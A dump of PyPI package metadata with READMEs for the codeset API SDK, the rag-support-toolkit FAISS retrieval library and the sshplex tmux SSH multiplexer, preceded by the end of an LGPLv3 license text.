other than an Application or a Combined Work as defined below.
An "Application" is any work that makes use of an interface provided
by the Library, but which is not otherwise based on the Library.
Defining a subclass of a class defined by the Library is deemed a mode
of using an interface provided by the Library.
A "Combined Work" is a work produced by combining or linking an
Application with the Library. The particular version of the Library
with which the Combined Work was made is also called the "Linked
Version".
The "Minimal Corresponding Source" for a Combined Work means the
Corresponding Source for the Combined Work, excluding any source code
for portions of the Combined Work that, considered in isolation, are
based on the Application, and not on the Linked Version.
The "Corresponding Application Code" for a Combined Work means the
object code and/or source code for the Application, including any data
and utility programs needed for reproducing the Combined Work from the
Application, but excluding the System Libraries of the Combined Work.
1. Exception to Section 3 of the GNU GPL.
You may convey a covered work under sections 3 and 4 of this License
without being bound by section 3 of the GNU GPL.
2. Conveying Modified Versions.
If you modify a copy of the Library, and, in your modifications, a
facility refers to a function or data to be supplied by an Application
that uses the facility (other than as an argument passed when the
facility is invoked), then you may convey a copy of the modified
version:
a) under this License, provided that you make a good faith effort to
ensure that, in the event an Application does not supply the
function or data, the facility still operates, and performs
whatever part of its purpose remains meaningful, or
b) under the GNU GPL, with none of the additional permissions of
this License applicable to that copy.
3. Object Code Incorporating Material from Library Header Files.
The object code form of an Application may incorporate material from
a header file that is part of the Library. You may convey such object
code under terms of your choice, provided that, if the incorporated
material is not limited to numerical parameters, data structure
layouts and accessors, or small macros, inline functions and templates
(ten or fewer lines in length), you do both of the following:
a) Give prominent notice with each copy of the object code that the
Library is used in it and that the Library and its use are
covered by this License.
b) Accompany the object code with a copy of the GNU GPL and this license
document.
4. Combined Works.
You may convey a Combined Work under terms of your choice that,
taken together, effectively do not restrict modification of the
portions of the Library contained in the Combined Work and reverse
engineering for debugging such modifications, if you also do each of
the following:
a) Give prominent notice with each copy of the Combined Work that
the Library is used in it and that the Library and its use are
covered by this License.
b) Accompany the Combined Work with a copy of the GNU GPL and this license
document.
c) For a Combined Work that displays copyright notices during
execution, include the copyright notice for the Library among
these notices, as well as a reference directing the user to the
copies of the GNU GPL and this license document.
d) Do one of the following:
0) Convey the Minimal Corresponding Source under the terms of this
License, and the Corresponding Application Code in a form
suitable for, and under terms that permit, the user to
recombine or relink the Application with a modified version of
the Linked Version to produce a modified Combined Work, in the
manner specified by section 6 of the GNU GPL for conveying
Corresponding Source.
1) Use a suitable shared library mechanism for linking with the
Library. A suitable mechanism is one that (a) uses at run time
a copy of the Library already present on the user's computer
system, and (b) will operate properly with a modified version
of the Library that is interface-compatible with the Linked
Version.
e) Provide Installation Information, but only if you would otherwise
be required to provide such information under section 6 of the
GNU GPL, and only to the extent that such information is
necessary to install and execute a modified version of the
Combined Work produced by recombining or relinking the
Application with a modified version of the Linked Version. (If
you use option 4d0, the Installation Information must accompany
the Minimal Corresponding Source and Corresponding Application
Code. If you use option 4d1, you must provide the Installation
Information in the manner specified by section 6 of the GNU GPL
for conveying Corresponding Source.)
5. Combined Libraries.
You may place library facilities that are a work based on the
Library side by side in a single library together with other library
facilities that are not Applications and are not covered by this
License, and convey such a combined library under terms of your
choice, if you do both of the following:
a) Accompany the combined library with a copy of the same work based
on the Library, uncombined with any other library facilities,
conveyed under the terms of this License.
b) Give prominent notice with the combined library that part of it
is a work based on the Library, and explaining where to find the
accompanying uncombined form of the same work.
6. Revised Versions of the GNU Lesser General Public License.
The Free Software Foundation may publish revised and/or new versions
of the GNU Lesser General Public License from time to time. Such new
versions will be similar in spirit to the present version, but may
differ in detail to address new problems or concerns.
Each version is given a distinguishing version number. If the
Library as you received it specifies that a certain numbered version
of the GNU Lesser General Public License "or any later version"
applies to it, you have the option of following the terms and
conditions either of that published version or of any later version
published by the Free Software Foundation. If the Library as you
received it does not specify a version number of the GNU Lesser
General Public License, you may choose any version of the GNU Lesser
General Public License ever published by the Free Software Foundation.
If the Library as you received it specifies that a proxy can decide
whether future versions of the GNU Lesser General Public License shall
apply, that proxy's public statement of acceptance of any version is
permanent authorization for you to choose that version for the
Library.
| hubspot | [
"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)",
"Programming Language :: Python",
"Programming Language :: Python :: 3"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"twine; extra == \"dev\"",
"bumpver; extra == \"dev\"",
"pip-tools; extra == \"dev\"",
"pytest; extra == \"dev\"",
"check-manifest; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/ScalizerOrg/s6r-hubspot"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:34:02.772072 | s6r_hubspot-1.0.17.tar.gz | 17,245 | 20/a2/dc49b7941f9917916b9bc4785ae59d6669bc32156306ef5d8cfdfb2ef0e3/s6r_hubspot-1.0.17.tar.gz | source | sdist | null | false | a0c8892aaa17fcf9865873232b6de5dc | b112e7ded86062d402a4b6b4515943bcb37fad400306c1f064634a98eceb4707 | 20a2dc49b7941f9917916b9bc4785ae59d6669bc32156306ef5d8cfdfb2ef0e3 | null | [
"LICENSE"
] | 225 |
2.3 | codeset | 0.9.0 | The official Python library for the codeset API | # Codeset Python API library
<!-- prettier-ignore -->
[)](https://pypi.org/project/codeset/)
The Codeset Python library provides convenient access to the Codeset REST API from any Python 3.9+
application. The library includes type definitions for all request params and response fields,
and offers both synchronous and asynchronous clients powered by [httpx](https://github.com/encode/httpx).
It is generated with [Stainless](https://www.stainless.com/).
## Documentation
The REST API documentation can be found on [docs.codeset.ai](https://docs.codeset.ai). The full API of this library can be found in [api.md](https://github.com/codeset-ai/codeset-sdk/tree/main/api.md).
## Installation
```sh
# install from PyPI
pip install codeset
```
## Usage
The full API of this library can be found in [api.md](https://github.com/codeset-ai/codeset-sdk/tree/main/api.md).
```python
import os
from codeset import Codeset
client = Codeset(
api_key=os.environ.get("CODESET_API_KEY"), # This is the default and can be omitted
)
response = client.health.check()
print(response.service)
```
While you can provide an `api_key` keyword argument,
we recommend using [python-dotenv](https://pypi.org/project/python-dotenv/)
to add `CODESET_API_KEY="My API Key"` to your `.env` file
so that your API Key is not stored in source control.
## Async usage
Simply import `AsyncCodeset` instead of `Codeset` and use `await` with each API call:
```python
import os
import asyncio
from codeset import AsyncCodeset
client = AsyncCodeset(
api_key=os.environ.get("CODESET_API_KEY"), # This is the default and can be omitted
)
async def main() -> None:
response = await client.health.check()
print(response.service)
asyncio.run(main())
```
Functionality between the synchronous and asynchronous clients is otherwise identical.
### With aiohttp
By default, the async client uses `httpx` for HTTP requests. However, for improved concurrency performance you may also use `aiohttp` as the HTTP backend.
You can enable this by installing `aiohttp`:
```sh
# install from PyPI
pip install codeset[aiohttp]
```
Then you can enable it by instantiating the client with `http_client=DefaultAioHttpClient()`:
```python
import os
import asyncio
from codeset import DefaultAioHttpClient
from codeset import AsyncCodeset
async def main() -> None:
async with AsyncCodeset(
api_key=os.environ.get("CODESET_API_KEY"), # This is the default and can be omitted
http_client=DefaultAioHttpClient(),
) as client:
response = await client.health.check()
print(response.service)
asyncio.run(main())
```
## Using types
Nested request parameters are [TypedDicts](https://docs.python.org/3/library/typing.html#typing.TypedDict). Responses are [Pydantic models](https://docs.pydantic.dev) which also provide helper methods for things like:
- Serializing back into JSON, `model.to_json()`
- Converting to a dictionary, `model.to_dict()`
Typed requests and responses provide autocomplete and documentation within your editor. If you would like to see type errors in VS Code to help catch bugs earlier, set `python.analysis.typeCheckingMode` to `basic`.
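As a sketch of what TypedDict request params buy you (illustrative only; `CheckParams` is a made-up name, not part of this SDK):

```python
from typing import TypedDict

class CheckParams(TypedDict, total=False):
    # total=False makes every key optional, mirroring optional request params.
    verbose: bool
    region: str

params: CheckParams = {"verbose": True}  # your editor autocompletes the keys
```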
## Handling errors
When the library is unable to connect to the API (for example, due to network connection problems or a timeout), a subclass of `codeset.APIConnectionError` is raised.
When the API returns a non-success status code (that is, 4xx or 5xx
response), a subclass of `codeset.APIStatusError` is raised, containing `status_code` and `response` properties.
All errors inherit from `codeset.APIError`.
```python
import codeset
from codeset import Codeset
client = Codeset()
try:
client.health.check()
except codeset.APIConnectionError as e:
print("The server could not be reached")
print(e.__cause__) # an underlying Exception, likely raised within httpx.
except codeset.RateLimitError as e:
print("A 429 status code was received; we should back off a bit.")
except codeset.APIStatusError as e:
print("Another non-200-range status code was received")
print(e.status_code)
print(e.response)
```
Error codes are as follows:
| Status Code | Error Type |
| ----------- | -------------------------- |
| 400 | `BadRequestError` |
| 401 | `AuthenticationError` |
| 403 | `PermissionDeniedError` |
| 404 | `NotFoundError` |
| 422 | `UnprocessableEntityError` |
| 429 | `RateLimitError` |
| >=500 | `InternalServerError` |
| N/A | `APIConnectionError` |
### Retries
Certain errors are automatically retried 2 times by default, with a short exponential backoff.
Connection errors (for example, due to a network connectivity problem), 408 Request Timeout, 409 Conflict,
429 Rate Limit, and >=500 Internal errors are all retried by default.
You can use the `max_retries` option to configure or disable retry settings:
```python
from codeset import Codeset
# Configure the default for all requests:
client = Codeset(
# default is 2
max_retries=0,
)
# Or, configure per-request:
client.with_options(max_retries=5).health.check()
```
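The short exponential backoff mentioned above roughly means each retry waits about twice as long as the one before it (a conceptual sketch, not the SDK's actual schedule or jitter):

```python
def backoff_delays(base: float = 0.5, max_retries: int = 3) -> list[float]:
    # Delay before retry i doubles each time: base, 2*base, 4*base, ...
    return [base * 2**i for i in range(max_retries)]

print(backoff_delays())  # → [0.5, 1.0, 2.0]
```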
### Timeouts
By default requests time out after 5 minutes. You can configure this with a `timeout` option,
which accepts a float or an [`httpx.Timeout`](https://www.python-httpx.org/advanced/timeouts/#fine-tuning-the-configuration) object:
```python
import httpx

from codeset import Codeset
# Configure the default for all requests:
client = Codeset(
# 20 seconds (default is 5 minutes)
timeout=20.0,
)
# More granular control:
client = Codeset(
timeout=httpx.Timeout(60.0, read=5.0, write=10.0, connect=2.0),
)
# Override per-request:
client.with_options(timeout=5.0).health.check()
```
On timeout, an `APITimeoutError` is thrown.
Note that requests that time out are [retried twice by default](https://github.com/codeset-ai/codeset-sdk/tree/main/#retries).
## Advanced
### Logging
We use the standard library [`logging`](https://docs.python.org/3/library/logging.html) module.
You can enable logging by setting the environment variable `CODESET_LOG` to `info`.
```shell
$ export CODESET_LOG=info
```
Set it to `debug` for more verbose logging.
### How to tell whether `None` means `null` or missing
In an API response, a field may be explicitly `null`, or missing entirely; in either case, its value is `None` in this library. You can differentiate the two cases with `.model_fields_set`:
```py
if response.my_field is None:
if 'my_field' not in response.model_fields_set:
print('Got json like {}, without a "my_field" key present at all.')
else:
print('Got json like {"my_field": null}.')
```
### Accessing raw response data (e.g. headers)
The "raw" Response object can be accessed by prefixing `.with_raw_response.` to any HTTP method call, e.g.,
```py
from codeset import Codeset
client = Codeset()
response = client.health.with_raw_response.check()
print(response.headers.get('X-My-Header'))
health = response.parse() # get the object that `health.check()` would have returned
print(health.service)
```
These methods return an [`APIResponse`](https://github.com/codeset-ai/codeset-sdk/tree/main/src/codeset/_response.py) object.
The async client returns an [`AsyncAPIResponse`](https://github.com/codeset-ai/codeset-sdk/tree/main/src/codeset/_response.py) with the same structure, the only difference being `await`able methods for reading the response content.
#### `.with_streaming_response`
The above interface eagerly reads the full response body when you make the request, which may not always be what you want.
To stream the response body, use `.with_streaming_response` instead, which requires a context manager and only reads the response body once you call `.read()`, `.text()`, `.json()`, `.iter_bytes()`, `.iter_text()`, `.iter_lines()` or `.parse()`. In the async client, these are async methods.
```python
with client.health.with_streaming_response.check() as response:
print(response.headers.get("X-My-Header"))
for line in response.iter_lines():
print(line)
```
The context manager is required so that the response will reliably be closed.
### Making custom/undocumented requests
This library is typed for convenient access to the documented API.
If you need to access undocumented endpoints, params, or response properties, the library can still be used.
#### Undocumented endpoints
To make requests to undocumented endpoints, you can make requests using `client.get`, `client.post`, and other
http verbs. Options on the client will be respected (such as retries) when making this request.
```py
import httpx
response = client.post(
"/foo",
cast_to=httpx.Response,
body={"my_param": True},
)
print(response.headers.get("x-foo"))
```
#### Undocumented request params
If you want to explicitly send an extra param, you can do so with the `extra_query`, `extra_body`, and `extra_headers` request
options.
#### Undocumented response properties
To access undocumented response properties, you can access the extra fields like `response.unknown_prop`. You
can also get all the extra fields on the Pydantic model as a dict with
[`response.model_extra`](https://docs.pydantic.dev/latest/api/base_model/#pydantic.BaseModel.model_extra).
### Configuring the HTTP client
You can directly override the [httpx client](https://www.python-httpx.org/api/#client) to customize it for your use case, including:
- Support for [proxies](https://www.python-httpx.org/advanced/proxies/)
- Custom [transports](https://www.python-httpx.org/advanced/transports/)
- Additional [advanced](https://www.python-httpx.org/advanced/clients/) functionality
```python
import httpx
from codeset import Codeset, DefaultHttpxClient
client = Codeset(
# Or use the `CODESET_BASE_URL` env var
base_url="http://my.test.server.example.com:8083",
http_client=DefaultHttpxClient(
proxy="http://my.test.proxy.example.com",
transport=httpx.HTTPTransport(local_address="0.0.0.0"),
),
)
```
You can also customize the client on a per-request basis by using `with_options()`:
```python
client.with_options(http_client=DefaultHttpxClient(...))
```
### Managing HTTP resources
By default the library closes underlying HTTP connections whenever the client is [garbage collected](https://docs.python.org/3/reference/datamodel.html#object.__del__). You can manually close the client using the `.close()` method if desired, or with a context manager that closes when exiting.
```py
from codeset import Codeset
with Codeset() as client:
# make requests here
...
# HTTP client is now closed
```
## Versioning
This package generally follows [SemVer](https://semver.org/spec/v2.0.0.html) conventions, though certain backwards-incompatible changes may be released as minor versions:
1. Changes that only affect static types, without breaking runtime behavior.
2. Changes to library internals which are technically public but not intended or documented for external use. _(Please open a GitHub issue to let us know if you are relying on such internals.)_
3. Changes that we do not expect to impact the vast majority of users in practice.
We take backwards-compatibility seriously and work hard to ensure you can rely on a smooth upgrade experience.
We are keen for your feedback; please open an [issue](https://www.github.com/codeset-ai/codeset-sdk/issues) with questions, bugs, or suggestions.
### Determining the installed version
If you've upgraded to the latest version but aren't seeing any new features you were expecting then your python environment is likely still using an older version.
You can determine the version that is being used at runtime with:
```py
import codeset
print(codeset.__version__)
```
## Requirements
Python 3.9 or higher.
## Contributing
See [the contributing documentation](https://github.com/codeset-ai/codeset-sdk/tree/main/CONTRIBUTING.md).
| text/markdown | Codeset | null | null | null | Apache-2.0 | null | [
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: OS Independent",
"Operating System :: POSIX",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Software Development :: Libraries :: Python Modules",
"Typing :: Typed"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"anyio<5,>=3.5.0",
"distro<2,>=1.7.0",
"httpx<1,>=0.23.0",
"pydantic<3,>=1.9.0",
"sniffio",
"typing-extensions<5,>=4.10",
"aiohttp; extra == \"aiohttp\"",
"httpx-aiohttp>=0.1.9; extra == \"aiohttp\""
] | [] | [] | [] | [
"Homepage, https://github.com/codeset-ai/codeset-sdk",
"Repository, https://github.com/codeset-ai/codeset-sdk"
] | twine/5.1.1 CPython/3.12.9 | 2026-02-20T09:33:59.722656 | codeset-0.9.0.tar.gz | 116,036 | af/e8/8695cd29dd68e2ed8e6a79b0beeaf0f7ab1b903c40fdeee6ca20f5f9a3fe/codeset-0.9.0.tar.gz | source | sdist | null | false | e9aa4eedc537e1b96d8a76adce2adbc3 | 9045334935e509fb321ef293ce480557507c5f26f60d8725481c21c39f3fb7c5 | afe88695cd29dd68e2ed8e6a79b0beeaf0f7ab1b903c40fdeee6ca20f5f9a3fe | null | [] | 222 |
2.4 | rag-support-toolkit | 0.1.1 | FAISS-based RAG utility library | # rag-toolkit
A FAISS-based RAG (Retrieval-Augmented Generation) utility library.
## Installation
```bash
pip install -e .
# Additionally required when building a DB from PDFs
pip install pdfminer.six
```
---
## Directory layout
```
rag_toolkit/
├── __init__.py
├── builders/
│   └── db_builder.py        # vector DB builder class
├── retrievers/
│   └── faiss_retriever.py   # search class (the core of the library)
└── tools/
    └── tool.py              # LLM tool base class
```
---
## Class overview
| Class | Role |
|---|---|
| `DBBuilder` | Builds a vector DB from PDF, CSV, and JSON sources |
| `FaissRetriever` | Core class handling single-DB search, cross-DB search, and LLM tool integration |
| `Tool` | Abstract base class for LLM agent integration |
### Files produced by DBBuilder
| Source | Default file names | Loading with FaissRetriever |
|---|---|---|
| PDF | `vector_index.faiss` / `metadata.json` | Readable with default settings |
| CSV | `qa_index.faiss` / `qa_metadata.json` | Specify `index_filename` / `meta_filename` |
| JSON | `knowledge_index.faiss` / `knowledge_metadata.json` | Specify `index_filename` / `meta_filename` |
---
## Building a DB (DBBuilder)
### Basic workflow
```python
from rag_toolkit import DBBuilder
builder = DBBuilder(output_dir="database/my_system/")
# Build a manual DB from PDFs
builder.build_from_pdf(["manual.pdf", "release_notes.pdf"])
# Build a QA DB from a CSV of Q/A pairs
builder.build_from_csv("qa.csv")
# Build a character-knowledge DB from JSON
builder.build_from_json("knowledge.json")
```
### Example 1: a manual DB from PDFs
```python
from rag_toolkit import DBBuilder
builder = DBBuilder(
output_dir="database/sample_XYZ_system/",
    chunk_size=1000,    # characters per chunk
    chunk_overlap=200,  # overlap between chunks, in characters
)
builder.build_from_pdf(
pdf_files=[
"database/sample_XYZ_system/XYZシステムリリースノート.pdf",
"database/sample_XYZ_system/XYZシステム統合ユーザーマニュアル.pdf",
],
index_filename="vector_index.faiss",
meta_filename="metadata.json",
)
```
### Example 2: a QA DB from a CSV (Q/A format)
```python
builder.build_from_csv(
csv_file="database/sample_XYZ_system/XYZ_system_QA.csv",
    question_col="Q",  # header name of the question column
    answer_col="A",    # header name of the answer column
index_filename="qa_index.faiss",
meta_filename="qa_metadata.json",
)
```
### Example 3: a character-knowledge DB from JSON
```python
from rag_toolkit import DBBuilder
knowledge_builder = DBBuilder(output_dir="database/DB_ikazuchi_mal/")
knowledge_builder.build_from_json(
json_file="database/documents_mal_knowledge.json",
index_filename="knowledge_index.faiss",
meta_filename="knowledge_metadata.json",
    category_value="いかづちマル",  # set to override metadata["カテゴリ"]
)
```
### Sharing the model when building multiple DBs (saves memory)
```python
from rag_toolkit import DBBuilder
# Create one builder and build several DBs in a row with the same model
builder = DBBuilder(output_dir="database/sample_XYZ_system/")
builder.build_from_pdf([...])
builder.build_from_csv(...)
# The loaded model can be reused even when writing to a different output directory
knowledge_builder = DBBuilder(
output_dir="database/DB_ikazuchi_mal/",
    model=builder.model,  # pass the already-loaded model
)
knowledge_builder.build_from_json(...)
```
---
## Searching a DB (FaissRetriever)
### 1. Single-DB search
```python
from rag_toolkit import FaissRetriever
# Manual search
manual = FaissRetriever(
name="search_xyz_manual",
description="XYZシステムの仕様書・マニュアルを検索する",
database_dir="database/sample_XYZ_system/",
    meta_page_key="page",  # set when you want page numbers shown
)
# QA search ("question+answer" refers to the joined Q/A text)
qa = FaissRetriever(
name="search_xyz_qa",
description="XYZシステムの過去QAを検索する",
database_dir="database/sample_XYZ_system/",
index_filename="qa_index.faiss",
meta_filename="qa_metadata.json",
meta_text_keys=["text", "question+answer"],
)
print(manual.run_query("パスワードのリセット手順"))
print(qa.run_query("ログインできない場合の対処法"))
```
### 2. Cross-DB search
```python
# Return merged results ordered by score, best first
results = FaissRetriever.search_multi([manual, qa], "ログインエラーの対処法")
for r in results:
print(r["source"], r["total_score"], r["text"])
# Get the results as a single string
text = FaissRetriever.search_multi_as_str([manual, qa], "ログインエラーの対処法")
print(text)
```
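Conceptually, `search_multi` just pools the per-DB hits and orders them by score (an illustrative sketch, not the library's implementation):

```python
def merge_results(results_per_db):
    # Each DB contributes (source, score, text) hits; pool them
    # across DBs and sort by score, best first.
    pooled = [hit for hits in results_per_db for hit in hits]
    return sorted(pooled, key=lambda hit: hit[1], reverse=True)

merged = merge_results([
    [("manual", 0.91, "password reset steps"), ("manual", 0.40, "intro")],
    [("qa", 0.87, "login troubleshooting")],
])
print([hit[0] for hit in merged])  # → ['manual', 'qa', 'manual']
```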
### 3. Using it as an LLM agent tool
```python
retriever = FaissRetriever(
name="search_xyz_manual",
description="XYZシステムの仕様書・マニュアルを検索する",
database_dir="database/sample_XYZ_system/",
prompt="以下の参考情報をもとに回答してください。",
)
context = {"query_text": "エラーコード E-501 の意味"}
result = retriever.run(context)
# result["status"]  -> "success" or "ignore"
# result["message"] -> prompt + search results (the string passed to the LLM)
print(result["message"])
```
---
## Dependencies
| Library | Purpose |
|---|---|
| `faiss-cpu >= 1.7` | Building and searching the vector index |
| `sentence-transformers >= 2.2` | Embedding text into vectors |
| `numpy >= 1.24` | Numerical computation |
| `pdfminer.six` (optional) | Text extraction from PDFs (only needed for `build_from_pdf`) |
| text/markdown | null | null | null | null | null | null | [] | [] | null | null | >=3.13 | [] | [] | [] | [
"faiss-cpu>=1.13.2",
"numpy>=2.4.2",
"pdfminer-six>=20260107",
"sentence-transformers>=5.2.3",
"twine>=6.2.0"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.13.9 | 2026-02-20T09:33:59.253422 | rag_support_toolkit-0.1.1.tar.gz | 16,848 | d7/68/4ca704cc8e0371aa090b2e030e7e620c217a0f9fa362d0539f76490c8090/rag_support_toolkit-0.1.1.tar.gz | source | sdist | null | false | cb0a1e96321b5a09b7de93198f3c3aa7 | 47c1bdfb04f38acdedb7803ea4f0f2ab683c1d36a202f27b8f2c0174ea9882a4 | d7684ca704cc8e0371aa090b2e030e7e620c217a0f9fa362d0539f76490c8090 | null | [] | 216 |
2.4 | sshplex | 1.3.1 | Multiplex your SSH connections with style | 
**Multiplex your SSH connections with style**
SSHplex is a Python-based SSH connection multiplexer that provides a modern Terminal User Interface (TUI) for selecting and connecting to multiple hosts simultaneously using tmux. It integrates with multiple Sources of Truth (NetBox, Ansible, Consul, static lists) and creates organized tmux sessions for efficient multi-host management.
## Features
- **Interactive TUI**: Modern host selector built with Textual - search, sort, select, connect
- **Multiple Sources of Truth**: NetBox, Ansible inventories, HashiCorp Consul, and static host lists - use them together or separately
- **Multi-Provider Support**: Configure multiple instances of the same provider type (e.g., multiple NetBox instances, multiple Consul datacenters)
- **tmux Integration**: Creates organized sessions with panes or windows for each host
- **iTerm2 Integration**: Native tmux `-CC` mode on macOS for iTerm2 tabs/splits, with improved detection and fallback guidance
- **Proxy Support**: Per-provider SSH proxy/jump host configuration
- **Wildcard Search**: Filter hosts across all columns with glob patterns
- **Config Editor**: Edit `sshplex.yaml` directly from the TUI (`e`) with tabbed form and validation
- **Built-in Help**: Keyboard shortcuts help modal (`h`) with live mode/state hints
- **Sortable Columns**: Click column headers to sort the host table
- **Copy to Clipboard**: Copy the host table to clipboard for sharing
- **Intelligent Caching**: Local host caching for fast startup (configurable TTL)
- **Broadcasting**: Sync input across multiple SSH connections
- **Session Manager**: Browse, connect to, or kill existing tmux sessions from the TUI
- **SSH Security**: Configurable host key checking with secure defaults
- **Connection Retry**: Automatic retry with exponential backoff for reliability
- **Enhanced CLI**: Debug mode, cache management, and configuration utilities
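The wildcard search behaves like glob matching applied to every column of the host table; a minimal stand-in using the standard library (illustrative only, not sshplex's actual code):

```python
from fnmatch import fnmatch

hosts = [
    {"name": "web-01", "tags": "web,production"},
    {"name": "db-01", "tags": "database,production"},
]

def matches(host: dict, pattern: str) -> bool:
    # A host matches if any column value matches the glob pattern.
    return any(fnmatch(str(value), pattern) for value in host.values())

print([h["name"] for h in hosts if matches(h, "web*")])  # → ['web-01']
```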
## Prerequisites
- **Python 3.8+**
- **tmux**
- **SSH key** configured for target hosts
- **macOS or Linux** (Windows via WSL)
```bash
# macOS
brew install tmux python3
# Ubuntu/Debian
sudo apt install tmux python3 python3-pip
# RHEL/CentOS/Fedora
sudo dnf install tmux python3 python3-pip
```
## Installation
### From PyPI
```bash
pip install sshplex
# With Consul support
pip install "sshplex[consul]"
```
### From Source
```bash
git clone https://github.com/sabrimjd/sshplex.git
cd sshplex
pip install -e .
# With Consul support
pip install -e ".[consul]"
# With dev dependencies
pip install -e ".[dev]"
```
## Quick Start
```bash
# Launch TUI (creates default config on first run)
sshplex
# Debug mode - test provider connectivity
sshplex --debug
# Show configuration paths
sshplex --show-config
# Clear host cache
sshplex --clear-cache
```
On first run, SSHplex creates a config at `~/.config/sshplex/sshplex.yaml`. Edit it with your provider details, then run `sshplex` again.
## What's New (Quality Upgrade)
Recent quality and UX improvements include:
- Stronger config/runtime error handling and input validation
- iTerm2 integration reliability improvements (installation/running detection + better fallback messaging)
- Parallel provider fetching support for faster multi-provider discovery
- Faster cache validity checks before deep metadata parsing
- TUI polish: config editor (`e`), help modal (`h`), and improved visual selection cues
See [CHANGELOG.md](CHANGELOG.md) for full details.
## Usage
1. **Start**: Run `sshplex`
2. **Browse**: Hosts from all configured providers appear in the table
3. **Search**: Press `/` to filter hosts (supports wildcards)
4. **Select**: `Space` to toggle, `a` to select all, `d` to deselect all
5. **Configure**: `p` to toggle panes/tabs, `b` to toggle broadcast
6. **Edit Config**: `e` to open the built-in configuration editor
7. **Connect**: `Enter` to create tmux session and connect
8. **Sessions**: `s` to manage existing tmux sessions
9. **Copy**: `c` to copy the host table to clipboard
10. **Refresh**: `r` to refresh hosts from providers (bypasses cache)
### TUI Keybindings
| Key | Action |
|-----|--------|
| `Space` | Toggle host selection |
| `a` | Select all hosts |
| `d` | Deselect all hosts |
| `Enter` | Connect to selected hosts |
| `/` | Search/filter hosts |
| `p` | Toggle panes/tabs mode |
| `b` | Toggle broadcast mode |
| `s` | Open session manager |
| `e` | Open configuration editor |
| `h` | Open keyboard shortcuts help |
| `c` | Copy table to clipboard |
| `r` | Refresh from providers |
| `Escape` | Focus table / clear search |
| `q` | Quit |
### tmux Commands (once attached)
```bash
Ctrl+b + Arrow Keys # Switch between panes
Ctrl+b + n/p # Next/Previous window
Ctrl+b + b # Toggle broadcast (custom SSHplex binding)
Ctrl+b + d # Detach from session
Ctrl+b + z # Zoom/unzoom current pane
```
## CLI Reference
```bash
sshplex # Launch TUI
sshplex --debug # Test provider connectivity
sshplex --clear-cache # Clear host cache
sshplex --show-config # Show configuration paths
sshplex --config /path/to.yml # Use custom config file
sshplex --verbose # Enable verbose logging
sshplex --version # Show version
```
## Configuration
Configuration is stored at `~/.config/sshplex/sshplex.yaml`. See [config-template.yaml](sshplex/config-template.yaml) for a full example.
### Static Hosts
```yaml
sot:
import:
- name: "my-servers"
type: static
hosts:
- name: "web-01"
ip: "192.168.1.10"
description: "Web server"
tags: ["web", "production"]
- name: "db-01"
ip: "192.168.1.20"
description: "Database server"
tags: ["database", "production"]
```
### NetBox
```yaml
sot:
import:
- name: "prod-netbox"
type: netbox
url: "https://netbox.example.com/"
token: "your-api-token"
verify_ssl: true
timeout: 30
default_filters:
status: "active"
role: "virtual-machine"
has_primary_ip: "true"
```
### Ansible Inventory
```yaml
sot:
import:
- name: "production-hosts"
type: ansible
inventory_paths:
- "/path/to/inventory.yml"
default_filters:
groups: ["webservers", "databases"]
exclude_groups: ["maintenance"]
host_patterns: ["^prod-.*"]
```
### Consul
Requires `pip install "sshplex[consul]"`.
```yaml
sot:
import:
- name: "consul-dc1"
type: consul
config:
host: "consul.example.com"
port: 443
token: "your-consul-token"
scheme: "https"
verify: false
dc: "dc1"
cert: "" # Optional SSL cert path
```
### SSH Proxy / Jump Host
Configure per-provider proxy routing:
```yaml
ssh:
username: "admin"
key_path: "~/.ssh/id_ed25519"
port: 22
proxy:
- name: "prod-proxy"
imports: ["consul-dc1", "prod-netbox"] # Which providers use this proxy
host: "jumphost.example.com"
username: "admin"
key_path: "~/.ssh/jump_key"
```
### SSH Security Options
Configure SSH host key checking and retry behavior:
```yaml
ssh:
username: "admin"
key_path: "~/.ssh/id_ed25519"
# Security options
strict_host_key_checking: false # Options: true (strict), false (accept-new)
user_known_hosts_file: "" # Empty = default ~/.ssh/known_hosts
# Connection retry
retry:
enabled: true
max_attempts: 3
delay_seconds: 2
exponential_backoff: true # Double delay on each retry
```
**Security Note**: By default, SSHplex uses `StrictHostKeyChecking=accept-new` which automatically accepts new host keys but warns on key changes. For production environments, set `strict_host_key_checking: true` for maximum security.
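With the retry settings above (3 attempts, 2-second base delay, exponential backoff), the waits between attempts come out to 2s and then 4s. An illustrative sketch of that schedule (not sshplex internals):

```python
def retry_delays(max_attempts: int = 3, delay_seconds: int = 2,
                 exponential_backoff: bool = True) -> list[int]:
    # One delay before each retry; it doubles when exponential backoff is on.
    delays, delay = [], delay_seconds
    for _ in range(max_attempts - 1):
        delays.append(delay)
        if exponential_backoff:
            delay *= 2
    return delays

print(retry_delays())  # → [2, 4]
```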
### iTerm2 Integration (macOS)
Enable native iTerm2 tmux integration with `-CC` mode:
```yaml
tmux:
control_with_iterm2: true # Opens new iTerm2 window with native tabs/splits
```
### Cache
```yaml
cache:
enabled: true
cache_dir: "~/.cache/sshplex"
ttl_hours: 24 # Refresh daily
```
### UI
```yaml
ui:
show_log_panel: false
table_columns: ["name", "ip", "cluster", "role", "tags", "description", "provider"]
```
## Troubleshooting
### Debug Mode
```bash
sshplex --debug
```
Tests provider connectivity and lists all discovered hosts.
### Enable Logging
```yaml
logging:
enabled: true
level: "DEBUG"
file: "logs/sshplex.log"
```
### Common Issues
| Issue | Solution |
|-------|----------|
| `tmux is not installed` | Install tmux: `brew install tmux` / `apt install tmux` |
| NetBox connection failed | Check URL, token, and network connectivity |
| Ansible inventory not loading | Verify file paths exist and YAML syntax is valid |
| No hosts found | Remove filters temporarily, check provider logs |
| Consul import error | Install with `pip install "sshplex[consul]"` |
| SSH key auth failed | Check key path and permissions (`chmod 600`) |
## Development
```bash
git clone https://github.com/sabrimjd/sshplex.git
cd sshplex
pip install -e ".[dev]"
# Run tests
python3 -m pytest tests/
# Lint & quality checks
ruff check sshplex tests
